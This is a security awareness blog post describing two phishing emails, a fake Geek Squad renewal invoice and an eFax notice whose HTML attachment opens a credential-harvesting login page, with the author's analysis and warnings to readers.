Friday Phish Fry

Phishing Email Alerts

Catch of the Day: eFax Phish
Chef’s Special: Geek Squad phish

Examples of clever phish that made it past my spam filters and into my inbox. Some are sent by clients or readers like you, and other reliable sources on the Internet.

You can send phishing samples to me at phish@wyzguys.com.

My intention is to provide a warning and show current examples of phishing scams, related articles, and education about how these scams and exploits work, and how to detect them in your inbox. If the pictures are too small or extend off the page, double clicking the image will display them in a photo viewer app.


Geek Squad Phish

I love it when I get renewal notices from the Geek Squad.  It reminds me of the scene in the Princess Bride when Fezzik says “I’m on the Brute Squad, and Miracle Max looks at him and says “You are the Brute Squad.”    I am the Geek Squad.  Computer repair is what I’ve been doing for 20 years.  This is another “call the 800 number” exploit.  Just don’t.  You owe nothing to the Geek Squad, and if you did paying this invoice would not square your debt.

 


eFax Phish

I received this “eFax” notice.  Evidently there is a “paystub” (money) which is the lure on this attack.  The HTML attachment tells me that that this exploit will use the self-hosted web page exploit at some point.  Let’s play.  Here’s the email.

The email headers show that this email came from the United Kingdom by way of South Africa.  This is a very convoluted set of headers, and I am not sure what all the steps through the loopback address 127.0.0.1 are about

 

I downloaded the attachment to see what I would find

 

Sure enough, a self-hosted login landing page.  I entered the usual fake password.

And was redirected to a most unusual and totally genuine Microsoft sign-in error message page.

I sent the attachment to VirusTotal, and at the date of this exploit, 2022-06-19, this was not yet flagged by any security vendor.

This was definitely a credential stealing exploit, but for what cloud service or account I have not idea.  Microsoft?  Not positive about that, but most likely.


 

1

About the Author:

I am a cybersecurity and IT instructor, cybersecurity analyst, pen-tester, trainer, and speaker. I am an owner of the WyzCo Group Inc. In addition to consulting on security products and services, I also conduct security audits, compliance audits, vulnerability assessments and penetration tests. I also teach Cybersecurity Awareness Training classes. I work as an information technology and cybersecurity instructor for several training and certification organizations. I have worked in corporate, military, government, and workforce development training environments I am a frequent speaker at professional conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference in 2016, 2017, 2018, 2019, the (ISC)2 World Congress 2016, and the ISSA International Conference 2017, and many local community organizations, including Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2006 at http://wyzguyscybersecurity.com

Comments

Add a Comment


This site uses Akismet to reduce spam. Learn how your comment data is processed.